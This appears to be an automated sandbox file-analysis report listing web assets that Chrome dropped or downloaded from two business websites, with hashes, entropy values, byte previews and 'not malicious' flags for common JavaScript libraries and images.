                                              Preview:/*!. * ScrollSmoother 3.11.2. * https://greensock.com. * . * @license Copyright 2022, GreenSock. All rights reserved.. * This plugin is a membership benefit of Club GreenSock and is only authorized for use in sites/apps/products developed by individuals/companies with an active Club GreenSock membership. See https://greensock.com/club. * @author: Jack Doyle, jack@greensock.com. */..!function(e, t) {. "object" == typeof exports && "undefined" != typeof module ? t(exports) : "function" == typeof define && define.amd ? define(["exports"], t) : t((e = e || self).window = e.window || {}).}(this, function(e) {. "use strict";. function _defineProperties(e, t) {. for (var r = 0; r < t.length; r++) {. var n = t[r];. n.enumerable = n.enumerable || !1,. n.configurable = !0,. "value"in n && (n.writable = !0),. Object.defineProperty(e, n.key, n). }. }. function r() {. return "undefined" != typeof window. }
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 500 x 505, 8-bit colormap, non-interlaced
                                              Category:dropped
                                              Size (bytes):96564
                                              Entropy (8bit):7.992383226973363
                                              Encrypted:true
                                              SSDEEP:1536:EVGMiW5mfWPMwyvj21VThLuvcJJ/iwcFReM6+AAdPfV8p0EdapiwHQs01hDBqai:EVGMRmfWkwWU76o6wcPeMoKPfep0Edal
                                              MD5:76F591BC5EAD2B8AFC0E8A4DB01F8504
                                              SHA1:F6B77A755B2D7346DD6C92508D09747FC991FE6F
                                              SHA-256:B6A0DDF3BA99A704FC08B4F13BDE833AA525989BA348ED63F5780FA0A871F0E4
                                              SHA-512:2193C7D1A26B3E7036123D3EF6583EDE4A6500AF4AA523906D866E6C9397E057E998D5123E9E0C0D22D23CAE02F5FA09464BC50D2AA28DBB6DA57BF709512C54
                                              Malicious:false
                                              Reputation:low
                                              Preview:.PNG........IHDR.............@.<f....PLTELiq...gl.<0!Z..}mb/<c...`~.PUraH'.g%..........t.u){...P..=..m.J.._..7....S..C......../...+8@....>..v..I.......e..a.*........}.}...Y....C......;..E.3.w#.(.0.9...<..?...!&.*.o...h;(.. o.r.v....;.].5V2...&.YE...d.~ZJ.s..|c{K.....].......M.5.......ZC..TwL<.wb....F.V....W..$|....jQ...jO.U7)...F.`E8.......h..6DM..v..).tZ.....$....qBMTy...."-3+...R9.(}x<(..J.sVj@.........iB1I(.....~MXb.h.Zdm.J..h4$.`...g$cq|....jY....D/.n......ZC'..unj..........:...Q.....tRNS...Z6....Y.Z}.r..4c.....pHYs............... .IDATx...O.....KZ.*.:=l...x..7.liT.<...`?@.5b=..p<#.. ....G..;%Y..cYF.a...N.....w.&.......i0..4..s.|?...<...p...y8...<...p...y8...<...p...y8...<...p...y8...<...p...y8....3......._~..~...x4..O>y.....}..{8..Y.m"}Kg<..Z.h..j..V.5.../?c...x@......1X.F-~..n7.mE..d2..Iv..O?..~.R.............~.[...s.t..d............?....G.....h.U.&..n2..n...[.....ah.z........+..6tz...j.h7..F.......q
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 100 x 100, 8-bit colormap, non-interlaced
                                              Category:downloaded
                                              Size (bytes):3423
                                              Entropy (8bit):7.926911822882082
                                              Encrypted:false
                                              SSDEEP:48:6pfDb+kOHpIYKV9EzoV1E96jmvycVfci9GkA50PuC4kW3Vn3ZIl963P3Ekb:6pfJQpM9m96d4Ui9Gkr43LsGfFb
                                              MD5:1C86FCF9DEE024E4CE21F1D10FEC0515
                                              SHA1:A108E744E81FDECE77BBF4F79E56CA0215CB13D9
                                              SHA-256:16EF663936C823C75598224F8C86C906F923D3723A856F63626E4FF2C719E62E
                                              SHA-512:B21498A5B35496D0852EBB1C25A7407C127817BCC5D4BFBABFE657683C224D4A603FBDF641F4FA279448B004B25D506D6DD6BD4288E127582032430BEE7F3EE5
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.tomsher.com/assets/images/menu/custom-web.png
                                              Preview:.PNG........IHDR...d...d.....G<ef...MPLTE..J .c3+..../+....2,....!!e>. .m" j'$t..h..R......4-...E..84-{...$#i.7v..C+*.......;...%.p.2r...#"f...%.Q.)]9....2-..._..:.....<z...$h.5e.....>;....9...I'!....1{{'.]..U..(A...#L...a^.D.+.j..X..&.2t.].....|.@|..R*Bd:3.E(YH.......0.;O>>...|.....&*[g.....Q..zT...A...X...s/d..R...S hmj.].K.FpV@y`^..O....k.qKK~.oG..B..e.....UM....IDATh..._.j...d..X.!.&L..!!.....k...l..^..o.j......Z..^.. -..9.]............./...D.....x*.h.....'G.d..yN.s.E...(.0..?.W*.H.hU....1$..t..Y.....fr....n..-.......?.I\..X..].*.2N.~J.xr.....r.=d)..D<^..l....e.m.U......z.]o....*....L..mZq....D...\$.<..h...n....i.u.........0.."c.6I.`.A?..=.!.d.......Q.......Tj.D......$.*..n..A.r...w...!....N ...."...j.9...(.$E..+\0.....R....U...f..F.7'..R..q..r..x.4.P.L>....D&.H.....(..X'6@.V. .R.E.EqUr...~...#F..)%.\....!..k.p...F...B!(`n+..@..A/....}.]*L .VO...A\.TURu.utp.>h.2.L&S..Xj..v.-..l...ph.... *..U_G.!..=@S$.......o+4..6.E.9r..I..H.E}$..m....
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:ASCII text, with very long lines (32042)
                                              Category:dropped
                                              Size (bytes):89031
                                              Entropy (8bit):5.101153363386029
                                              Encrypted:false
                                              SSDEEP:768:SH5U9RI5auoSDXMU43DCgryWTJRqlxC07Ekz+sbW4o/hPyUKOKYmm4vfX31ePROQ:+E6BfK8ONmmRPQdmYad9xD69umg
                                              MD5:BE4D6F4195222ADDAF474B45325E8DBC
                                              SHA1:D9520B1A05CCC172C424161F693FACA2B7CEAC54
                                              SHA-256:16750FD8712BF8B9EC03897561F94DDE9AD564848BC0AB36141ED7F7F7DD3C11
                                              SHA-512:9CA6432BECED2BA520FB607A0D9C7E42D81EC809A8F584E16686FC3B7C608EA870D8855074021315AB25FE3A9BC83C1C94C90B5C5399462CAD9D4AD793F3CCE8
                                              Malicious:false
                                              Reputation:low
                                              Preview:/**!. * MixItUp v3.3.1. * A high-performance, dependency-free library for animated filtering, sorting and more. * Build 94e0fbf6-cd0b-4987-b3c0-14b59b67b8a0. *. * @copyright Copyright 2014-2018 KunkaLabs Limited.. * @author KunkaLabs Limited.. * @link https://www.kunkalabs.com/mixitup/. *. * @license Commercial use requires a commercial license.. * https://www.kunkalabs.com/mixitup/licenses/. *. * Non-commercial use permitted under same terms as CC BY-NC 3.0 license.. * http://creativecommons.org/licenses/by-nc/3.0/. */.!function(t){"use strict";var e=null,n=null;!function(){var e=["webkit","moz","o","ms"],n=t.document.createElement("div"),a=-1;for(a=0;a<e.length&&!t.requestAnimationFrame;a++)t.requestAnimationFrame=t[e[a]+"RequestAnimationFrame"];"undefined"==typeof n.nextElementSibling&&Object.defineProperty(t.Element.prototype,"nextElementSibling",{get:function(){for(var t=this.nextSibling;t;){if(1===t.nodeType)return t;t=t.nextSibling}retu
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 155 x 80, 8-bit/color RGB, non-interlaced
                                              Category:downloaded
                                              Size (bytes):3153
                                              Entropy (8bit):7.921231079798889
                                              Encrypted:false
                                              SSDEEP:96:vR1FgH9XUq0MyRDJaYzLjCPEJshJBWM9u:vR4HR0MyVMYCjJAM9u
                                              MD5:1CE45B6F43119F09E608842103797C72
                                              SHA1:563700070D78708BF89A0E85EB1156CB2D17B673
                                              SHA-256:5BB2C1FCC4894AF53A4477D019E72BEB6591ED3874D116BE4436BBC192DC7464
                                              SHA-512:E908FF642A8B043D7C0853F843D14C17F6F26E67FF928DD871C5851016C276B13349235739C649CD9F83814DC792F68D60368FCA52A1C5C4AEEB2F16AA2E49CD
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.tomsher.com/assets/imgs/logos/5.png
                                              Preview:.PNG........IHDR.......P......,......tEXtSoftware.Adobe ImageReadyq.e<....IDATx...PS.....=..Y.N....RQP\P.*...Z...@.I..Bk]h.,VxH...Z.Tp)O.......(....HH.Y.I0\BDt..7...0.s.Y....s...x.Ap..#...@..DA@..DA@....(....(...Q....Q....Q ... ... .DA@..DA@..D.(....(....(...Q....G..E".@.D..7...Y....^v.....r.H....TX..&. .x.X.R.S..H...o..&kw.|!.?.....%..@8 .R4..[...0\.v.N.s<".1PCMU.4.![$..i..~...-.Q^..3.:J.$...3.O..T.....?.(*|ys[..B.""...h.\O.u...D.Rs...K...~r...N.."....[a..:{......+.O..1...Yt..A../...k.*....nv~.'...z}...E8...Ovw...6.=..-m.N.~.jzY..~s....3{.#._.._K....<.E.T....G{..!...q|......:z.....*%Zr.....2.V;....f/&Jo....K.p.%.-]o......+xS.|..S9.;...#........t....Px0..C...d.]L...8.e..vR...+.'6...........Z.c{.....2#.P.8.N...%...Nqi..*..B.L...'.x..u.h..8QW....r.f}..j7....dE..D.|...........bKBuQ...P....:X.....8..[..J.-.!.Lv...|<a...-.Mq.U......S.N..o..(<.w.8..-...6l.]..E..2...]ll..`n.dc2.P............`c....Tg.....LF1K_f..J>..Y.....J....e....k.m[.K...
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:RIFF (little-endian) data, Web/P image
                                              Category:dropped
                                              Size (bytes):56552
                                              Entropy (8bit):7.996002286598437
                                              Encrypted:true
                                              SSDEEP:1536:IB4xRE4PHa8ifoyEcwuLvoYB5MxnxTrNq8HUMuSN:9Y4moyEFaoYB5MbTrAqX
                                              MD5:2FB7C41470073929B74E98C05F1CFE20
                                              SHA1:7B9EAA3B33469CA00C72B65104BDD9EEEFBFAA0D
                                              SHA-256:ECB8E5D6ED1139E843FF9ABFF341EFC418264CD98DAD2A68310DBE18E893BB88
                                              SHA-512:D121C38976BDDC7C4441F133B256A9A745FC5E3E5D9F1CC8DB8E8940E808CB19C30FB83798E359BF398BE5DEA8D38D59F0B8CF5A0FE752E38F077277F0D000D0
                                              Malicious:false
                                              Reputation:low
                                              Preview:RIFF....WEBPVP8X..............VP8 l........*....>.n.S)&..#.J...gn........F.L8.......;..Y.._...z.<......C...u9.....jy....!o0.>....}!.H.............o..]._......=..b....4..~../...~H.s...../q.j..........I...._a.f...9...>..U.....o...<..;.'.s./.7..xu ..C|.a?"XOQ.Xp..Tf.j....yt..;.........2.@..........l...LEi...1C.XO.o..u)...`%...S.t...e.....)#..S,.....O..[.LS.....N|R[..o....._.b..p.E......V..?U.3.u6.L.E.Y.>H.N;.W .n......{...A.b..q_.b.Jb..T.m.AI$g-^+.$..0G.C;h6;r..../\%.|R..lkU.N...A.[dj..XQ..\W.X.9..../W#.n..O....>..n....\.mK..2....Ye....b..R..I...h....#.~@....:|)...n..BZ.L."~D.&&|...qVsh?">...U.Fr.o..b..qZe...S..[..8.9..E..5f..Q...Q.H..+.+r.i..4.ON|.[...A.b...[.b..p.&.!n..A..V..W.....E)......g/.>#..s[Jbg.$.\.._.R>.s.a...b..X..\g.q....^..p....\...'I..Y;....Q.6<.Kl.......0f+...Z....0....[;&...lV@oe.c.^.W......p .\..............E.2..]$kU....E.uk...6\*...t.@7..T_@............e...Jt.o...|.N....m...../hj.L3......iZ|(.e......*&#\.k..A......m..i.....{..
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:JPEG image data, progressive, precision 8, 400x300, components 3
                                              Category:dropped
                                              Size (bytes):12183
                                              Entropy (8bit):7.5793043783739655
                                              Encrypted:false
                                              SSDEEP:192:4YNMtKwj1RrFmeOzVfGCWAfCLLnbrwyfRVuq/d1QuFKHGRUX3Ldn:4YNg7fr8pRGZAfcF1FniXBn
                                              MD5:1C30A4A45DB86428634D8D8DB75FB649
                                              SHA1:60D8F2D60BD18204A31AF4F149A9AA49544D3248
                                              SHA-256:87F375DA1700A992916B69EF3415E7EA175566B5B906DD4E89D411A1955FD95C
                                              SHA-512:FD3DB92AA526A522A2FA4DB97DDDFE1BC0044CD9B21C6DF89938093CAFC41592AF10001E4A13E4848847E4EBDCDA5CC95646687932E6067E98073BAB8A26ED24
                                              Malicious:false
                                              Reputation:low
                                              Preview:.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1..........................
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:JSON data
                                              Category:dropped
                                              Size (bytes):3
                                              Entropy (8bit):1.584962500721156
                                              Encrypted:false
                                              SSDEEP:3:P:P
                                              MD5:8A80554C91D9FCA8ACB82F023DE02F11
                                              SHA1:5F36B2EA290645EE34D943220A14B54EE5EA5BE5
                                              SHA-256:CA3D163BAB055381827226140568F3BEF7EAAC187CEBD76878E0B63E9E442356
                                              SHA-512:CA4B6DEFB8ADCC010050BC8B1BB8F8092C4928B8A0FBA32146ABCFB256E4D91672F88CA2CDF6210E754E5B8AC5E23FB023806CCD749AC8B701F79A691F03C87A
                                              Malicious:false
                                              Reputation:low
                                              Preview:{}.
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], progressive, precision 8, 400x300, components 3
                                              Category:dropped
                                              Size (bytes):14936
                                              Entropy (8bit):7.629623179984029
                                              Encrypted:false
                                              SSDEEP:384:feZ71scef7C3sbsobryiM7wfosB6lQs+toq87:Q++38rTMEosBI+OZ7
                                              MD5:CAC22C887062A2AA88C0FAAB316D529C
                                              SHA1:F8129F496042FBB93A1E2F9367D77808525C58BB
                                              SHA-256:B1E2059D50F0F341BDD471B213DB6BFE3E4424C4954BF1F445DBF9BF5A9C307B
                                              SHA-512:CDCE2D783609620355CEED245335ED5D068389D30B188123F5D1C4CDDA3D26ED38FA8C691462042C9CC0A3D03FDDE72EEE8E8626CE7389B83B0D22BDAA153E5D
                                              Malicious:false
                                              Reputation:low
                                              Preview:......Exif..II*.................Ducky.......d...../http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.0-c000 79.171c27fab, 2022/08/16-22:35:41 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop 24.1 (Windows)" xmpMM:InstanceID="xmp.iid:9D1ECD9C933011ED8FEBE4E937E1C8D8" xmpMM:DocumentID="xmp.did:9D1ECD9D933011ED8FEBE4E937E1C8D8"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:9D1ECD9A933011ED8FEBE4E937E1C8D8" stRef:documentID="xmp.did:9D1ECD9B933011ED8FEBE4E937E1C8D8"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>...&Adobe.d...................%...1;..:V................................................................................................
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:GIF image data, version 89a, 1280 x 600
                                              Category:dropped
                                              Size (bytes):476463
                                              Entropy (8bit):7.911164684387778
                                              Encrypted:false
                                              SSDEEP:12288:5tw1ViV/uJYdmHwbe/Q4LDGDIQYgU0Zyj:P+qmJAmQsdHihHo
                                              MD5:95A2E1F47C1A9205712580394F3F75CB
                                              SHA1:353EB8AE1FFB402AC7E7FC36385A8406A5AF5E63
                                              SHA-256:692B09E97BF580E7913ECC44AB1AEC4800CA76545F7CB8A080C83B4357479DCF
                                              SHA-512:9DCCC1025A3EA96C4D503DFBF656EA578B4F0051EED498B62A7E779C3F19B56EDDE179F877E85D9AF30299CAAB0FC39B47AB9E82EB99A81E5015230827512662
                                              Malicious:false
                                              Reputation:low
                                              Preview:GIF89a..X....xxxwwwuuu...vvv...ttt............sss..................yyy.........rrr.....................................................qqqppp.............................................zzz.........{{{..........................nnn...ooo...~~~........................mmm...}}}...|||...YYYllljjjiii[[[...ZZZkkk......VVVXXX___```aaaccc\\\bbbWWWdddUUU]]]hhhfffeeeggg...^^^TTT.........SSSRRRPPP777...QQQ...OOO666NNN888JJJAAAKKK...MMMLLL...CCC???HHHIIIDDDBBB@@@.........===>>>EEE<<<FFFGGG......;;;:::...555999333444...222111...........................///000,,,---...+++***)))((('''...&&&%%%$$$...""" .........!!!......###..................................................................................................................................................................!..XMP DataXMP<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.0-c000 79.171c27fab, 2022/08/16-22:35:41 "> <rdf:RDF xmlns:rdf="http://www.w3.org/
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 100 x 100, 8-bit colormap, non-interlaced
                                              Category:dropped
                                              Size (bytes):5365
                                              Entropy (8bit):7.9516226413508795
                                              Encrypted:false
                                              SSDEEP:96:JKAuTDlmY7S5IY4Uc6i1aHbg6VS8tcHe0hj0sJb0KnNV8yy:wA0w51c6iQbgaS8tcHvlfVNV8yy
                                              MD5:88FE632C2AE5DAC3067AFC7D9644C1D0
                                              SHA1:9F2BE13F8FA1DD09BEDCFF7522D0ADB83A88510F
                                              SHA-256:F0BFCE6E79436C009EE8DDD55CCAC732FB6D6AB4EE38D2DEBDE98635A0F62CED
                                              SHA-512:A550C7B16534350B4CA2CE52D901B7238AEFAAEFC8E8DD299EFF18F01C722E18ADFFEDDD4BE9F54BF054A44830BAF5027DE4A368DFE33F05B3BBCFAC2834AC0A
                                              Malicious:false
                                              Reputation:low
                                              Preview:.PNG........IHDR...d...d.....G<ef...hPLTE....................[&........%.....!........$............._.../....R*..........Y..H......../..+....:aX^r....d....g............."....e......+.....Z.......o....K....WOT.........0.....A.A....o...9h....o=......s...........T..O.......T..jc.........lal..YZh=..x.............|........oOEf.......A|......vvyN..l....I...iW.E.......\.x...?.........HIDATh...W....g.{.{.....0. ....J.P..g4f..$.n.fw....@0:......L}...U.-.MU1.E.%.xQ+p....k.....}O.8.q./..~.@)...-.....T.eY..}.0'.T>....//..n=......,.;...P(..fY.B....0..i.........-............H ...Bdf...</........e`... .@@J.G~,..?./r~. ......r.......L0N..nb.A...1&.$.Y..<O._k.`.....9..ml.......JQ.u.~.[.$.^6.....a.r..!..VV.._P..I<..o....Ir/....Vo..9..s+..G.?..M.....?......j....D"....,......6...?.y......JC..Tww...L 6..0?.E.c+.....@d7./]"*.w.'.......?.XY...%.....J..@ ...^.q$.AH.......H)...."....:....l../..1?..c.!..#..E..6.+......dH.CxA..@.......:.)...Il.`~"s...D.(
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:SVG Scalable Vector Graphics image
                                              Category:downloaded
                                              Size (bytes):6580
                                              Entropy (8bit):5.178055247410916
                                              Encrypted:false
                                              SSDEEP:96:+hAitL5AfkLuAKFLiA9+L1AQHLKAjwIPXA+BtAhaLsAkzl/v/ZJuZq/rgN/OkcqH:sJykjYIh5kl3BwQUFJsVPsudeTg6AY
                                              MD5:981A797B970C59FCE7A627F97777E8F6
                                              SHA1:6A73D7AC6A738832692671328F299B1E7DCAEAD2
                                              SHA-256:B726380545BF22335567FE2BF35C2BBED0353F5BEA910A6EDB4FCEBC50BC11A5
                                              SHA-512:6806F3847D9C1355AA6F3FB81F5B27FB4339314061B7C8E13B4061994D60EA71514C97C2975DE8EC42328969F3D64F1CC20DAC0D6DD92BF737B828EBA406DE8B
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.tomsher.com/assets/imgs/hero/4/Group%207.svg
                                              Preview:<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="124.143" height="123.198" viewBox="0 0 124.143 123.198">. <defs>. <filter id="Rectangle_Copy_16" x="0" y="0" width="124.143" height="123.198" filterUnits="userSpaceOnUse">. <feOffset dy="3" input="SourceAlpha"/>. <feGaussianBlur stdDeviation="3" result="blur"/>. <feFlood flood-opacity="0.161"/>. <feComposite operator="in" in2="blur"/>. <feComposite in="SourceGraphic"/>. </filter>. <filter id="Point_03" x="78" y="89.099" width="37" height="24" filterUnits="userSpaceOnUse">. <feOffset dy="3" input="SourceAlpha"/>. <feGaussianBlur stdDeviation="3" result="blur-2"/>. <feFlood flood-opacity="0.161"/>. <feComposite operator="in" in2="blur-2"/>. <feComposite in="SourceGraphic"/>. </filter>. <filter id="Point_03_-_color" x="71" y="90.099" width="22" height="22" filterUnits="userSpaceOnUse">. <feOffset dy="3" input="SourceAlpha"/>.
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 640x828, components 3
                                              Category:downloaded
                                              Size (bytes):45980
                                              Entropy (8bit):7.907311535015654
                                              Encrypted:false
                                              SSDEEP:768:JuOR2GP3mm5+BcA7pXqeh8L9hu4O+YxBlKHaA2fGIG0n1AQTZfCZf/:YOR/3n5cXhv+YMHn2jfTTZf0f/
                                              MD5:727B952C2AB5E50C5879716262A8AC81
                                              SHA1:FAE14358F2BA3D069FE4D7B320E9796A5A357794
                                              SHA-256:AF484341D6451B311FE5BD1AC22F13274FAA6DCC24E8D972D8D3E10E1731A421
                                              SHA-512:27B118D0CDA5682CC7D381D2AA633B9605B20D57DDFC399B148756859143C3465226D58BFFCABD9C6FADF49FEFC30813EB991EFE177B3B6EDB21F558606EF1C0
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.citydiamondcontracting.com/uploads/certifications/1/c3477d31049b9b96e47ca0d2bf05bcdb.jpg
                                              Preview:......Exif..II*.................Ducky............./http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.0-c000 79.171c27fab, 2022/08/16-22:35:41 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop 24.1 (Windows)" xmpMM:InstanceID="xmp.iid:9CDD67C8930B11ED8D208D96229A68C3" xmpMM:DocumentID="xmp.did:9CDD67C9930B11ED8D208D96229A68C3"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:9CDD67C6930B11ED8D208D96229A68C3" stRef:documentID="xmp.did:9CDD67C7930B11ED8D208D96229A68C3"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d................'..'2&.&2.&&&&.>55555>DAAAAAADDDDDDDDDDDDDDDDDDDDDDDDDDDDD.... . &..&6& &6D6++6DDDB5BDDDDDDDDDDDDDDDDDDDDDDDD
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:downloaded
                                              Size (bytes):16
                                              Entropy (8bit):3.875
                                              Encrypted:false
                                              SSDEEP:3:HwT:QT
                                              MD5:344EB8D19F5C0A3435EF32FD9601F1FB
                                              SHA1:E082EB1D89D91CC1A25A1D510268E576109DA07E
                                              SHA-256:B44289B54959639FCA6A742F7CC2E2A5AF9C6E7B73C1B3E25227CA9790F3A587
                                              SHA-512:EB9F1CD4A566192160371F4B182EE00180F6912333FFB79C537BD80635A6AFE6379FBE7BB74043D635BA65C9F4F956D9E97E516E24E516F2591192A36F866EAE
                                              Malicious:false
                                              Reputation:low
                                              URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISEAkbY9T3vM_3IRIFDc5BTHo=?alt=proto
                                              Preview:CgkKBw3OQUx6GgA=
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 155 x 80, 8-bit/color RGBA, non-interlaced
                                              Category:dropped
                                              Size (bytes):15764
                                              Entropy (8bit):7.959141688135173
                                              Encrypted:false
                                              SSDEEP:384:K0wFwe8uKrCT2U3Qjbv3aYr65r5Kd3xBJWCFfpqLccRcBjN:Kce8ufgH3aJQ3WxLccRcv
                                              MD5:5EA3AB72AAAAFFC45F6C691E6868BA45
                                              SHA1:06A5BF4877F0D20427958603B0CFC24CD4639581
                                              SHA-256:ED140BFF11431081802465A422AB8BD90135C2A8B830EBC4F53A7F4EFF85BBB2
                                              SHA-512:F6470DB7AE4A4D95259937A96D198B31F97A364DDD6AACFB9B4DAC1E77360F136549EC2C1F167F434E8D1BC99986FFBD8A50C7DCFED5867F785C7E3460DC02ED
                                              Malicious:false
                                              Reputation:low
                                              Preview:.PNG........IHDR.......P......N......gAMA......a....IiCCPsRGB IEC61966-2.1..H..SwX...>..e.VB..l.."#....Y....a...@...V....HU...H...(.gA..Z.U\8....}z...........y.....&..j.9R.<:...OH.....H.. ....g......yx~t.?...o...p..$......P&W. ...".....R...T.......S.d.....ly|B"......I>................(G$.@..`U.R,......@"......Y.2G.....v.X..@`...B,.. 8..C.... L..0.._p..H.....K.3.....w....!..l.Ba.).f.."...#.H..L.........8?......f.l....k.o">!.........N..._....p...u.k.[..V.h..]3...Z..z..y8.@...P.<......%b..0.>.3.o..~..@...z..q.@......qanv.R....B1n..#.....)..4.\,...X..P"M.y.R.D!.....2......w....O.N....l.~.....X.v.@~.-......g42y.......@+..........\...L....D..*.A..............a.D@.$.<.B.......A.T.:.............18....\..p..`........A...a!:..b.."......"aH4... ..Q"..r...Bj.]H#.-r.9.\@.... 2....G1...Q...u@......s.t4.]...k....=.....K.ut.}..c..1.f..a\..E`.X.&..c.X5V.5c.X7v....a..$......^...l...GXLXC.%.#....W...1.'"..O.%z...xb:..XF.&.!.!.%^'.._.H$...N.!%.2I.IkH.H-.S.>..i.L&.m....... ......O.
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:JPEG image data, progressive, precision 8, 400x300, components 3
                                              Category:dropped
                                              Size (bytes):24308
                                              Entropy (8bit):7.841289930655488
                                              Encrypted:false
                                              SSDEEP:384:4YNg7O44ho21kGP+/59qIqAj8tSBdLS4WohbqodUsdJ/BoOiOiouhDkMeTTmPVT8:4YyC44aI/PKuTG/LSX0bjUsJpoOinoNT
                                              MD5:BA514260DAF33C925D6286D1250A2D0E
                                              SHA1:BC12F313426F883DD8682A5972D0A3DFC8E3AB3E
                                              SHA-256:F36159395939A5B821689CE912CD02C491238259A8FC1569A1AF1A4CA653D97C
                                              SHA-512:5EC206EEBFBA15EDC97D17E11B6F17D0CB88D4B8ECC35F1829C864CADAF9FF61C86A63F4DD99F3EA507C07B79AE9F5842A74B99EBF5321D0DB042E31D24DB064
                                              Malicious:false
                                              Reputation:low
                                              Preview:.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1..........................
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 1024 x 640, 4-bit colormap, non-interlaced
                                              Category:dropped
                                              Size (bytes):88160
                                              Entropy (8bit):7.9536186057379155
                                              Encrypted:false
                                              SSDEEP:1536:Y2WPVggYmZotI/kv1XG6gl2zKuqU+S4iopDVGjx7Fx0D6xbL1:Q+A+I/kvNLgqz+S0VV2xn0A
                                              MD5:E01E8B1F38B88AC37E235DFA961654CB
                                              SHA1:C29BE57528AE7F4A075FCFE05B6ADEC6640ECF8E
                                              SHA-256:AACDC68DE52F1A4885F6F352B9803CC8EBF08D4939B8F81B196F8B1189BCFB5A
                                              SHA-512:97BB8A87119F7B8E94C0781B3D2E9B197B1CBF0624A0DA143CA8F413EF8F60AE1341F469544DD3575033F9899A91B8CAF0C049F7E3BEC15397CF14E2DA356758
                                              Malicious:false
                                              Reputation:low
